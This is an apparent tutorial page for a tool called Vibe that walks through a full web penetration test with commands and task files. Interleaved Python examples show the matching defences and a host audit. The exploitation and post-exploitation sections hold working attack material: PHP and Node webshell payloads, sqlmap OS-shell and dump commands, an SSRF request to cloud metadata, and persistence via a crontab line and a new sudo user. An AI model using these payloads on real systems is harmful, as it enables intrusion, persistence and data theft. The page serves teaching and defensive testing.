Real‑World: End‑to‑End Penetration Testing
Vibe Prompt
“Plan a comprehensive web penetration test: from information gathering, vulnerability scanning, exploitation, to shell acquisition.”
Full Workflow Overview
Phase 1 – Reconnaissance (1–2 days)
├── OSINT (domain, email, subdomains)
├── Technology Stack Identification
├── Port Scanning (Nmap)
└── Directory Enumeration (Gobuster, Dirb)
Phase 2 – Vulnerability Scanning (1–2 days)
├── Nessus / OpenVAS
├── OWASP ZAP
├── Nikto
└── Nuclei
Phase 3 – Exploitation (2–3 days)
├── SQL Injection (SQLMap)
├── XSS (manual verification)
├── File Upload Bypass
├── SSRF
├── Insecure Direct Object References (IDOR)
└── Privilege Escalation
Phase 4 – Post‑Exploitation (1 day)
├── Webshell Deployment
├── Persistence
├── Lateral Movement
├── Sensitive Data Collection
└── Cleanup & Takedown
Phase 5 – Reporting (1–2 days)
├── Vulnerability Summary
├── Risk Rating (CVSS)
├── Remediation Guidance
└── Appendix (Payloads, Screenshots)
What?
This workflow is a proven, repeatable process that covers every stage of a penetration test. It ensures that no critical step—reconnaissance, scanning, exploitation, post‑exploitation, or reporting—is omitted.
Why?
For developers and founders, a structured approach reduces the risk of costly security incidents. It also demonstrates compliance with industry standards (e.g., OWASP ASVS, NIST SP 800‑115) and can be a selling point for security‑centric customers. A well‑documented test can lower insurance premiums and provide a clear ROI by preventing data breaches that could cost millions.
How?
Using Vibe Coding, you can automate many of these steps, integrate them into CI/CD pipelines, and generate reproducible reports. Below we detail each phase with commands, tools, and Vibe‑specific scripts.
Phase 1 – Reconnaissance
1.1 OSINT
| Tool | Purpose | Vibe Integration |
|------|---------|------------------|
| theHarvester | Gather emails, subdomains, hosts | `vibe run theHarvester -d target.com -b all -l 1000` |
| crt.sh | Discover certificates for subdomains | `vibe run crt.sh -d target.com` |
| dnsdumpster | DNS enumeration | `vibe run dnsdumpster -d target.com` |
Why?
Early discovery of the attack surface defines the scope of the test and ensures you focus on real, in-scope assets.
How?
Create a Vibe task file `recon.yml`:

```yaml
tasks:
  - name: Gather subdomains
    command: theHarvester -d target.com -b all -l 1000
  - name: Certificate enumeration
    command: crt.sh -d target.com
  - name: DNS dump
    command: dnsdumpster -d target.com
```

Run with `vibe run recon.yml`.
1.2 Technology Stack Identification
| Tool | Purpose | Vibe Integration |
|------|---------|------------------|
| WhatWeb | Detect web server, CMS, frameworks | `vibe run whatweb -a 3 target.com` |
| Wappalyzer | Browser extension or CLI | `vibe run wappalyzer target.com` |
Why?
Knowing the stack informs which vulnerability libraries and exploits are relevant.
How?
Add to `recon.yml`:

```yaml
  - name: Detect stack
    command: whatweb -a 3 target.com
```
1.3 Port Scanning (Nmap)
```bash
# Full scan
nmap -sV -sC -O -A -p- -T4 target.com -oA nmap_report

# Parameters explained
# -sV: Service/version detection
# -sC: Default scripts
# -O:  OS detection
# -A:  Aggressive scan (enables -sV, -sC, -O and traceroute; the three flags above are
#      redundant with -A and are kept only for readability)
# -p-: Scan all 65535 ports
# -T4: Aggressive timing
# -oA: Output in all formats (xml, nmap, grepable)
```
Why?
Open ports reveal potential entry points and help prioritize scanning.
How?
Create a Vibe task:

```yaml
  - name: Nmap full scan
    command: nmap -sV -sC -O -A -p- -T4 target.com -oA nmap_report
```
1.4 Directory Enumeration (Gobuster)
```bash
gobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 50
gobuster vhost -u https://target.com -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -t 30
```
Why?
Hidden directories often host admin panels, API endpoints, or legacy services.
How?
Add to Vibe:

```yaml
  - name: Gobuster directory
    command: gobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 50
  - name: Gobuster vhost
    command: gobuster vhost -u https://target.com -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -t 30
```
Phase 2 – Vulnerability Scanning
2.1 Nessus / OpenVAS
| Tool | Purpose | Vibe Integration |
|------|---------|------------------|
| Nessus | Comprehensive vulnerability scanner | `vibe run nessus -s target.com` |
| OpenVAS | Open‑source alternative | `vibe run openvas -s target.com` |
Why?
Automated scanners surface known CVEs, misconfigurations, and missing patches.
How?
Define a Vibe task:

```yaml
  - name: Nessus scan
    command: nessus -s target.com
```
2.2 OWASP ZAP
```bash
zap.sh -daemon -port 8090 -config api.disablekey=true
```
Why?
ZAP is ideal for dynamic web application testing, especially for APIs. Note that `api.disablekey=true` lets anything that can reach port 8090 drive the scanner, so keep the daemon listening on localhost only or leave the API key enabled.
How?
Create a Vibe task:

```yaml
  - name: Start ZAP
    command: zap.sh -daemon -port 8090 -config api.disablekey=true
```
2.3 Nikto
```bash
nikto -h https://target.com -o nikto_report.txt
```
Why?
Nikto checks for outdated software, default files, and common misconfigurations.
How?
Vibe task:

```yaml
  - name: Nikto scan
    command: nikto -h https://target.com -o nikto_report.txt
```
2.4 Nuclei
```bash
nuclei -u https://target.com -t nuclei-templates/ -o nuclei_report.txt
```
Why?
Nuclei uses a large template library for quick detection of known vulnerabilities.
How?
Vibe task:

```yaml
  - name: Nuclei scan
    command: nuclei -u https://target.com -t nuclei-templates/ -o nuclei_report.txt
```
Phase 3 – Exploitation
3.1 SQL Injection (SQLMap)
```bash
# Basic injection
sqlmap -u "https://target.com/products?id=1" --batch --level=3 --risk=2

# List databases
sqlmap -u "https://target.com/products?id=1" --batch --dbs

# List tables in a database
sqlmap -u "https://target.com/products?id=1" --batch -D mydb --tables

# Dump a table
sqlmap -u "https://target.com/products?id=1" --batch -D mydb -T users --dump

# Get OS shell
sqlmap -u "https://target.com/products?id=1" --batch --os-shell
```
Why?
SQL injection can lead to data exfiltration, privilege escalation, or remote code execution.
How?
Wrap each command in a Vibe task:

```yaml
  - name: SQLMap basic
    command: sqlmap -u "https://target.com/products?id=1" --batch --level=3 --risk=2
  - name: SQLMap dump users
    command: sqlmap -u "https://target.com/products?id=1" --batch -D mydb -T users --dump
```
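The report template later in this page records the remediation for the `id` parameter as "parameterized queries and input validation". The block below is an added example (not from the original page or from Vibe) that shows, on an in-memory SQLite table, why the `products?id=1` lookup is exploitable when the parameter is concatenated into the query and how the same lookup behaves once the value is type-checked and bound as a parameter. The table, its rows and the `secret` column are constructed for the demonstration.

```python
# Added example: the vulnerable query beside its parameterized form.
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed sample table; `secret = 1` marks rows the endpoint must never expose."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, secret INTEGER)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [(1, "widget", 0), (2, "gadget", 0), (3, "internal-prototype", 1)],
    )
    return conn


def get_product_vulnerable(conn: sqlite3.Connection, product_id: str) -> List[Tuple[int, str]]:
    """The request parameter becomes part of the SQL text, so it can rewrite the WHERE clause."""
    query = f"SELECT id, name FROM products WHERE id = {product_id} AND secret = 0"
    return conn.execute(query).fetchall()


def get_product_safe(conn: sqlite3.Connection, product_id: str) -> List[Tuple[int, str]]:
    """Validate the type first, then bind the value; it can only ever be compared, never parsed as SQL."""
    if not product_id.isdigit():
        raise ValueError("id must be a positive integer")
    return conn.execute(
        "SELECT id, name FROM products WHERE id = ? AND secret = 0",
        (int(product_id),),
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("normal request, vulnerable:", get_product_vulnerable(db, "1"))
    print("normal request, safe:      ", get_product_safe(db, "1"))
    print("tampered request, vulnerable:", get_product_vulnerable(db, "1 OR 1=1 --"))
    try:
        get_product_safe(db, "1 OR 1=1 --")
    except ValueError as exc:
        print("tampered request, safe: rejected:", exc)
```

The tampered value turns the filter into `id = 1 OR 1=1` and comments out the `secret = 0` guard, so the vulnerable function returns every row including the hidden one; the safe version rejects the value before it reaches the database, and even a numeric value that passes validation can only ever be compared against `id`.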
3.2 Cross‑Site Scripting (XSS)
| Technique | Tool | Vibe Integration |
|-----------|------|------------------|
| Reflected XSS | Burp Intruder | `vibe run burp_intruder -t target.com -p /search?q=...` |
| Stored XSS | Manual injection | `vibe run curl -X POST -d "comment=...<script>alert(1)</script>" https://target.com/api/comments` |
Why?
XSS can hijack sessions, deface sites, or execute arbitrary scripts.
How?
Create a Vibe task for Burp Intruder:

```yaml
  - name: Burp Intruder XSS
    command: burp_intruder -t target.com -p /search?q=... -payload "<script>alert(1)</script>"
```
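The stored-XSS row above posts a comment containing `<script>alert(1)</script>`; whether that fires depends entirely on how the application encodes the comment when it renders it. The following is an added example (not from the original page or from Vibe) of context-aware output encoding for a stored comment: one encoder for element text, one for a quoted attribute, and one for a value embedded in a `<script>` block. The `render_comment` function and its markup are an assumption made for the demonstration.

```python
# Added example: encode untrusted comment data for each HTML output context.
import html
import json


def for_html_text(value: str) -> str:
    """Element content: & < > become entities, so no tag can start."""
    return html.escape(value, quote=False)


def for_html_attr(value: str) -> str:
    """Quoted attribute value: quotes are escaped too, so the attribute cannot be closed early."""
    return html.escape(value, quote=True)


def for_js_literal(value: str) -> str:
    """JSON string literal safe inside <script>: < > & are written as Unicode escapes,
    so a value containing '</script>' cannot terminate the script block."""
    return (
        json.dumps(value)
        .replace("<", "\\u003c")
        .replace(">", "\\u003e")
        .replace("&", "\\u0026")
    )


def render_comment(author: str, text: str) -> str:
    """Render a stored comment, choosing the encoder that matches each context (assumed markup)."""
    return (
        f'<div class="comment" data-author="{for_html_attr(author)}">\n'
        f"  <p>{for_html_text(text)}</p>\n"
        f"  <script>window.lastCommentAuthor = {for_js_literal(author)};</script>\n"
        "</div>"
    )


if __name__ == "__main__":
    print(render_comment('"><img src=x onerror=alert(1)>', "<script>alert(1)</script>"))
```

A single "sanitize on input" pass cannot replace this: the same string needs different treatment in each context, and a templating engine that auto-escapes for HTML text still needs the JSON encoder for script blocks.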
3.3 File Upload Bypass
| Vulnerability | Exploit | Vibe Integration |
|---------------|---------|------------------|
| MIME type mismatch | Upload a PHP file disguised as image | `vibe run curl -F "file=@/tmp/shell.php" https://target.com/upload` |
| Directory traversal | `../../../../etc/passwd` | `vibe run curl -F "file=@/etc/passwd" https://target.com/upload` |
Why?
A successful upload bypass allows arbitrary code execution on the server.
How?
Vibe task:

```yaml
  - name: File upload bypass
    command: curl -F "file=@/tmp/shell.php" https://target.com/upload
```
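Both rows of the table above succeed only when the server trusts the client-supplied filename or MIME type. The block below is an added example (not from the original page or from Vibe) of an upload validator that rejects path components, checks the extension against an allowlist, verifies the file's magic bytes against that extension, and stores the file under a server-generated name. The allowlist, size limit and `UploadRejected` class are assumptions made for the demonstration.

```python
# Added example: hardened upload validation (the defence against the bypasses in 3.3).
import os
import secrets
from pathlib import Path

# Constructed allowlist: extension -> magic bytes the content must start with.
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
MAX_UPLOAD_BYTES = 5 * 1024 * 1024


class UploadRejected(ValueError):
    """Raised for any upload that fails validation (hypothetical exception type)."""


def validate_upload(client_filename: str, content: bytes) -> str:
    """Return the extension to store under, or raise UploadRejected.
    The client's filename and Content-Type header are untrusted; only the allowlist and file magic decide."""
    if not content or len(content) > MAX_UPLOAD_BYTES:
        raise UploadRejected("empty or too large")
    # Any path component (../, /, \) is an attempt to choose where the file lands.
    if client_filename != os.path.basename(client_filename.replace("\\", "/")) or client_filename in ("", ".", ".."):
        raise UploadRejected("filename must not contain path components")
    if "." not in client_filename:
        raise UploadRejected("missing extension")
    ext = client_filename.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f"extension .{ext} not allowed")
    if not content.startswith(ALLOWED_TYPES[ext]):
        raise UploadRejected("content does not match the declared type")
    return ext


def store_upload(upload_dir: Path, client_filename: str, content: bytes) -> Path:
    """Validate, then write under a random server-chosen name so the client never controls the path."""
    ext = validate_upload(client_filename, content)
    dest = upload_dir.resolve() / f"{secrets.token_hex(16)}.{ext}"
    dest.write_bytes(content)
    return dest


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    for name, body in [("photo.png", png), ("shell.php", b"<?php ... ?>"), ("shell.png", b"<?php ... ?>"), ("../../x.png", png)]:
        try:
            print(name, "->", validate_upload(name, body))
        except UploadRejected as exc:
            print(name, "-> rejected:", exc)
```

Pair this with serving the upload directory from a location where the web server will not execute scripts (or from a separate origin), so that a validator bug still does not turn an upload into code execution.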
3.4 Server‑Side Request Forgery (SSRF)
```bash
curl -X POST -d "url=http://169.254.169.254/latest/meta-data/" https://target.com/api/ssrf
```
Why?
SSRF can access internal services, leak secrets, or pivot to other hosts.
How?
Vibe task:

```yaml
  - name: SSRF test
    command: curl -X POST -d "url=http://169.254.169.254/latest/meta-data/" https://target.com/api/ssrf
```
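The request above works because the endpoint fetches whatever URL it is handed, including the link-local cloud metadata address. The following is an added example (not from the original page or from Vibe) of the check such an endpoint should apply before fetching: it allows only `http(s)`, rejects credential-bearing URLs, resolves the hostname and refuses any resolved address that is not globally routable, unwrapping IPv4-mapped IPv6 literals so they cannot be used to slip a private address past the check. The resolver is injectable so the block runs offline; the fake name-to-address table is constructed.

```python
# Added example: a destination check for a URL-fetching endpoint (the SSRF defence).
import ipaddress
import socket
from typing import Callable, List
from urllib.parse import urlsplit


def resolve_all(hostname: str) -> List[str]:
    """Every address the name resolves to (real DNS); replaced by a fake in tests."""
    return sorted({info[4][0] for info in socket.getaddrinfo(hostname, None)})


def is_safe_target(url: str, resolve: Callable[[str], List[str]] = resolve_all) -> bool:
    """True only for http(s) URLs whose resolved addresses are all globally routable.
    Rejects loopback, RFC 1918, link-local (169.254.169.254 metadata), multicast, reserved,
    IPv4-mapped IPv6 forms of those, and URLs carrying user:pass@ which confuse naive parsers."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    if parts.username is not None or parts.password is not None:
        return False
    try:
        addresses = resolve(parts.hostname)
    except (OSError, ValueError):
        return False
    if not addresses:
        return False
    for text in addresses:
        try:
            ip = ipaddress.ip_address(text)
        except ValueError:
            return False  # resolver returned something that is not an address
        if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
            ip = ip.ipv4_mapped  # ::ffff:169.254.169.254 is still the metadata service
        if not ip.is_global or ip.is_multicast or ip.is_reserved:
            return False
    return True


if __name__ == "__main__":
    # Constructed fake resolver: names map to fixed addresses, literals resolve to themselves.
    fake = lambda h: {"internal.corp": ["10.0.0.5"], "www.example.org": ["8.8.8.8"]}.get(h, [h])
    for u in ["http://169.254.169.254/latest/meta-data/", "http://internal.corp/admin",
              "http://[::ffff:169.254.169.254]/", "https://www.example.org/"]:
        print(u, "->", "allowed" if is_safe_target(u, fake) else "blocked")
```

Two caveats a practitioner would want: connect to the address that was checked rather than resolving again at connect time (otherwise a DNS answer can change between check and use), and re-run the check on every redirect hop, since a safe host can redirect the fetcher to an internal one.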
3.5 Insecure Direct Object References (IDOR)
```bash
curl -X GET https://target.com/api/users/123
curl -X GET https://target.com/api/users/124
```
Why?
IDOR allows attackers to read or modify data belonging to other users.
How?
Vibe task:

```yaml
  - name: IDOR test
    command: |
      for id in 123 124 125; do
        curl -X GET https://target.com/api/users/$id
      done
```
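The loop above is an IDOR finding when ids 124 and 125 return someone else's data to the caller who owns 123. The block below is an added example (not from the original page or from Vibe) with both sides of that: an object-level authorization check for the `/api/users/<id>` handler, and a detector that runs over access-log lines and reports authenticated users who fetched several distinct user ids, which is what the loop looks like from the server. The record store, the `Session` type and the log lines are constructed for the demonstration.

```python
# Added example: object-level authorization for /api/users/<id>, plus log-based detection.
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Set


class NotFound(Exception):
    """Hypothetical 404 exception; used for both missing and unauthorized ids."""


@dataclass(frozen=True)
class Session:
    user_id: int
    role: str = "user"


# Constructed sample records.
USER_RECORDS = {
    123: {"id": 123, "email": "alice@example.com"},
    124: {"id": 124, "email": "bob@example.com"},
    125: {"id": 125, "email": "carol@example.com"},
}


def get_user(session: Session, target_id: int) -> dict:
    """The id in the URL is never enough: the caller must own the record or hold the admin role.
    Unauthorized and nonexistent ids raise the same error so the endpoint cannot be used
    to enumerate which ids exist."""
    if session.role != "admin" and session.user_id != target_id:
        raise NotFound(target_id)
    record = USER_RECORDS.get(target_id)
    if record is None:
        raise NotFound(target_id)
    return record


# Combined-log-format lines, constructed; the first four are the loop from the page as the server sees it.
SAMPLE_LOG = """\
198.51.100.7 - alice [30/Jun/2026:10:00:01 +0000] "GET /api/users/123 HTTP/1.1" 200 512
198.51.100.7 - alice [30/Jun/2026:10:00:02 +0000] "GET /api/users/124 HTTP/1.1" 200 498
198.51.100.7 - alice [30/Jun/2026:10:00:02 +0000] "GET /api/users/125 HTTP/1.1" 200 503
198.51.100.7 - alice [30/Jun/2026:10:00:03 +0000] "GET /api/users/126 HTTP/1.1" 200 511
198.51.100.9 - bob [30/Jun/2026:10:00:05 +0000] "GET /api/users/200 HTTP/1.1" 200 490
198.51.100.9 - bob [30/Jun/2026:10:00:06 +0000] "GET /api/users/201 HTTP/1.1" 404 120
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) - (?P<user>\S+) \[[^\]]+\] "GET /api/users/(?P<id>\d+) [^"]*" (?P<status>\d{3})'
)


def enumeration_suspects(log_text: str, threshold: int = 3) -> Dict[str, Set[int]]:
    """Authenticated users who received 200 responses for `threshold` or more distinct user ids."""
    seen: Dict[str, Set[int]] = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and m.group("status") == "200":
            seen[m.group("user")].add(int(m.group("id")))
    return {user: ids for user, ids in seen.items() if len(ids) >= threshold}


if __name__ == "__main__":
    print(get_user(Session(123), 123))
    print(enumeration_suspects(SAMPLE_LOG))
```

Once the handler enforces ownership, the same log query becomes a regression check: a non-admin user with 200 responses for more than one id means the check has been bypassed or removed.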
3.6 Privilege Escalation
```bash
# Linux PE script
wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

# Common checks
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/crontab
uname -a
cat /etc/os-release
```
Why?
Even if initial access is limited, privilege escalation can grant full control.
How?
Create a Vibe task:

```yaml
  - name: Run linPEAS
    command: |
      wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh
      chmod +x linpeas.sh
      ./linpeas.sh
```
Phase 4 – Post‑Exploitation
4.1 Webshell Deployment
| Tool | Payload | Vibe Integration |
|------|---------|------------------|
| php | `<?php system($_GET['cmd']); ?>` | `vibe run curl -F "file=@/tmp/shell.php" https://target.com/upload` |
| Node.js | `require('child_process').execSync(process.argv[2])` | `vibe run curl -F "file=@/tmp/shell.js" https://target.com/upload` |
Why?
A webshell provides a persistent command interface for further exploitation.
How?
Vibe task:

```yaml
  - name: Deploy PHP webshell
    command: curl -F "file=@/tmp/shell.php" https://target.com/upload
```
4.2 Persistence
- Create a cron job that re‑uploads the shell.
- Add a new user with sudo privileges.
Why?
Persistence ensures continued access even after remediation.
How?
Vibe tasks:

```yaml
  - name: Add cron job
    command: echo "* * * * * root /usr/bin/curl -F 'file=@/tmp/shell.php' https://target.com/upload" >> /etc/crontab
  - name: Add privileged user
    command: useradd -m -s /bin/bash attacker && echo "attacker:password" | chpasswd && usermod -aG sudo attacker
```
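The privilege-escalation checks in 3.6 (`find / -perm -4000`, `cat /etc/crontab`, `sudo -l`) and the persistence tasks just above leave footprints that a host audit can pick up: an unexpected SUID binary, a system cron entry that fires every minute and reaches out over the network, and a new member of the `sudo` group. The following is an added example (not from the original page or from Vibe) that audits those three sources against a baseline, which is the check a blue team or the post-engagement cleanup verification would run. All inputs are constructed sample data in the real file formats; the cron line is the one from the persistence task above, and the baselines are assumptions.

```python
# Added example: host audit for the persistence and privilege-escalation footprints in 3.6 and 4.2.
import json
import re
from typing import Dict, List, Set, Tuple

# Constructed /etc/crontab; the last entry is the one the persistence task above appends.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin
# m h dom mon dow user  command
17 *\t* * *\troot    cd / && run-parts --report /etc/cron.hourly
0 3 * * * backup /usr/local/bin/nightly-backup.sh
* * * * * root /usr/bin/curl -F 'file=@/tmp/shell.php' https://target.com/upload
"""

# Constructed /etc/group excerpt and `find / -perm -4000` output.
SAMPLE_GROUP = "sudo:x:27:alice,attacker\nadm:x:4:alice\n"
SAMPLE_SUID = "/usr/bin/sudo\n/usr/bin/passwd\n/usr/bin/su\n/usr/local/bin/helper\n"

# Commands that download/upload, spawn interactive shells, or run from world-writable dirs.
SUSPICIOUS_CMD = re.compile(r"\b(curl|wget|nc|ncat|socat|python[23]?\s+-c|bash\s+-i)\b|/tmp/|/dev/shm/")


def suspicious_cron_entries(crontab: str) -> List[Tuple[str, str]]:
    """Return (reasons, line) for system crontab entries that warrant a look."""
    hits: List[Tuple[str, str]] = []
    for raw in crontab.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):
            continue  # blank, comment, or environment assignment
        fields = line.split(None, 6)  # 5 schedule fields, user, command
        if len(fields) < 7:
            continue
        schedule, command = " ".join(fields[:5]), fields[6]
        reasons = []
        if schedule == "* * * * *":
            reasons.append("runs every minute")
        if SUSPICIOUS_CMD.search(command):
            reasons.append("network tool, interactive shell, or world-writable path in command")
        if reasons:
            hits.append(("; ".join(reasons), line))
    return hits


def new_privileged_members(group_file: str, baseline: Set[str], group: str = "sudo") -> Set[str]:
    """Members of `group` (sudo, wheel, ...) that are not on the approved baseline."""
    for line in group_file.splitlines():
        parts = line.split(":")
        if len(parts) == 4 and parts[0] == group:
            return {m for m in parts[3].split(",") if m} - baseline
    return set()


def unexpected_suid(find_output: str, baseline: Set[str]) -> List[str]:
    """SUID binaries from `find / -perm -4000` output that the golden image does not have."""
    return sorted({p.strip() for p in find_output.splitlines() if p.strip()} - baseline)


def audit(crontab: str, group_file: str, suid_list: str,
          sudo_baseline: Set[str], suid_baseline: Set[str]) -> Dict[str, list]:
    return {
        "cron": suspicious_cron_entries(crontab),
        "sudo": sorted(new_privileged_members(group_file, sudo_baseline)),
        "suid": unexpected_suid(suid_list, suid_baseline),
    }


if __name__ == "__main__":
    result = audit(SAMPLE_CRONTAB, SAMPLE_GROUP, SAMPLE_SUID,
                   sudo_baseline={"alice"},
                   suid_baseline={"/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su"})
    print(json.dumps(result, indent=2))
```

Running the same audit before and after an engagement is also the simplest way to verify the cleanup step in 4.5 actually removed everything that was added.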
4.3 Lateral Movement
- Enumerate other hosts via `nmap -sP 10.0.0.0/24`.
- Exploit SMB shares or SSH keys.
Why?
Lateral movement expands the attack surface and can reach critical assets.
How?
Vibe task:

```yaml
  - name: Scan internal network
    # -sP is the legacy spelling of -sn (host discovery only, no port scan)
    command: nmap -sP 10.0.0.0/24 -oG internal_hosts.txt
```
4.4 Sensitive Data Collection
- Dump database credentials.
- Retrieve API keys from environment variables.
Why?
Data exfiltration is the primary business impact of a breach.
How?
Vibe task:

```yaml
  - name: Dump credentials
    command: cat /etc/credentials.txt
```
4.5 Cleanup & Takedown
- Delete uploaded files.
- Remove cron jobs and users.
Why?
Cleanup leaves no trace behind for forensic analysis.
How?
```yaml
  - name: Remove webshell
    command: rm -f /var/www/html/shell.php
  - name: Delete user
    command: userdel -r attacker
```
Phase 5 – Reporting
5.1 Report Template (Markdown)
```markdown
# Penetration Test Report

## Executive Summary
- **Target:** https://vibe-tutor.com
- **Scope:** Full web application and API surface
- **Duration:** 2026‑06‑30 to 2026‑07‑02
- **Findings:** 7 vulnerabilities (High: 2, Medium: 3, Low: 2)
- **Average CVSS:** 7.2

## High‑Risk Vulnerabilities

### H‑01: SQL Injection in /api/products
- **Description:** Unsanitized `id` parameter allows SQL injection.
- **CVSS:** 9.1 (Critical)
- **Evidence:** SQLMap successfully dumped `users` table.
- **Remediation:** Implement parameterized queries and input validation.

### H‑02: Broken Access Control in /api/admin
- **Description:** No authentication for admin endpoints.
- **CVSS:** 8.2 (High)
- **Evidence:** Direct access to `/api/admin/users` returned all user data.
- **Remediation:** Add role‑based middleware and enforce JWT validation.

## Medium‑Risk Vulnerabilities
... (details omitted for brevity)

## Low‑Risk Vulnerabilities
... (details omitted for brevity)

## Appendix
- **Payloads:** List of all payloads used.
- **Screenshots:** Attach relevant screenshots.
- **Logs:** Include scan logs and exploitation outputs.
```
5.2 How to Generate the Report with Vibe
Create a Vibe task:

```yaml
  - name: Generate report
    command: |
      echo "# Penetration Test Report" > report.md
      echo "## Executive Summary" >> report.md
      # Append findings programmatically
```

You can automate the insertion of findings by parsing scan outputs and using a templating engine such as Jinja2 within Vibe.
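The following is an added example (not from the original page or from Vibe) of the "append findings programmatically" step: a findings list is rated with the CVSS v3 qualitative scale, summarized (counts per bucket and average score), and rendered into the Markdown layout of the template in 5.1. It uses only the standard library so it runs anywhere; swapping the string assembly for a Jinja2 template is a mechanical change. The first two findings mirror H‑01 and H‑02 from the template; the medium and low findings, the `FINDINGS` structure and the `meta` keys are constructed for the demonstration.

```python
# Added example: rate, summarize and render findings into the 5.1 report layout.
from typing import Dict, List


def severity(score: float) -> str:
    """CVSS v3.x qualitative rating for a base score."""
    if score >= 9.0:
        return "Critical"
    if score >= 7.0:
        return "High"
    if score >= 4.0:
        return "Medium"
    if score > 0.0:
        return "Low"
    return "None"


# Constructed sample findings (H-01/H-02 follow the page's template; the rest are illustrative).
FINDINGS: List[Dict[str, object]] = [
    {"id": "H-01", "title": "SQL Injection in /api/products", "cvss": 9.1,
     "description": "Unsanitized `id` parameter allows SQL injection.",
     "evidence": "SQLMap successfully dumped `users` table.",
     "remediation": "Implement parameterized queries and input validation."},
    {"id": "H-02", "title": "Broken Access Control in /api/admin", "cvss": 8.2,
     "description": "No authentication for admin endpoints.",
     "evidence": "Direct access to `/api/admin/users` returned all user data.",
     "remediation": "Add role-based middleware and enforce JWT validation."},
    {"id": "M-01", "title": "Verbose error pages", "cvss": 5.3,
     "description": "Stack traces are returned to clients on unhandled exceptions.",
     "evidence": "Malformed JSON body returned a framework stack trace.",
     "remediation": "Return generic error responses; log details server-side."},
    {"id": "L-01", "title": "Missing Strict-Transport-Security header", "cvss": 3.0,
     "description": "HTTPS responses do not set HSTS.",
     "evidence": "Response headers captured during scanning.",
     "remediation": "Send Strict-Transport-Security with a long max-age."},
]


def summarize(findings: List[Dict[str, object]]) -> Dict[str, float]:
    """Counts per report bucket (Critical is reported under High, as in the template) and the average CVSS."""
    counts = {"High": 0, "Medium": 0, "Low": 0}
    for f in findings:
        sev = severity(float(f["cvss"]))
        bucket = "High" if sev in ("Critical", "High") else sev
        if bucket in counts:
            counts[bucket] += 1
    avg = round(sum(float(f["cvss"]) for f in findings) / len(findings), 1) if findings else 0.0
    return {"total": len(findings), **counts, "average_cvss": avg}


def render_report(meta: Dict[str, str], findings: List[Dict[str, object]]) -> str:
    """Render Markdown in the layout of the 5.1 template."""
    s = summarize(findings)
    lines = [
        "# Penetration Test Report", "", "## Executive Summary",
        f"- **Target:** {meta['target']}",
        f"- **Scope:** {meta['scope']}",
        f"- **Duration:** {meta['duration']}",
        f"- **Findings:** {s['total']} vulnerabilities (High: {s['High']}, Medium: {s['Medium']}, Low: {s['Low']})",
        f"- **Average CVSS:** {s['average_cvss']}", "",
    ]
    for label, sevs in [("High", ("Critical", "High")), ("Medium", ("Medium",)), ("Low", ("Low",))]:
        lines.append(f"## {label}-Risk Vulnerabilities")
        chosen = sorted((f for f in findings if severity(float(f["cvss"])) in sevs),
                        key=lambda f: -float(f["cvss"]))
        if not chosen:
            lines.append("- None identified.")
        for f in chosen:
            lines += [
                f"### {f['id']}: {f['title']}",
                f"- **Description:** {f['description']}",
                f"- **CVSS:** {f['cvss']} ({severity(float(f['cvss']))})",
                f"- **Evidence:** {f['evidence']}",
                f"- **Remediation:** {f['remediation']}", "",
            ]
        lines.append("")
    return "\n".join(lines)


if __name__ == "__main__":
    print(render_report({"target": "https://vibe-tutor.com",
                         "scope": "Full web application and API surface",
                         "duration": "2026-06-30 to 2026-07-02"}, FINDINGS))
```

Keeping the findings in a structured file that each Vibe task appends to, rather than in the report text, is what makes the summary counts and the average score reproducible across re-runs.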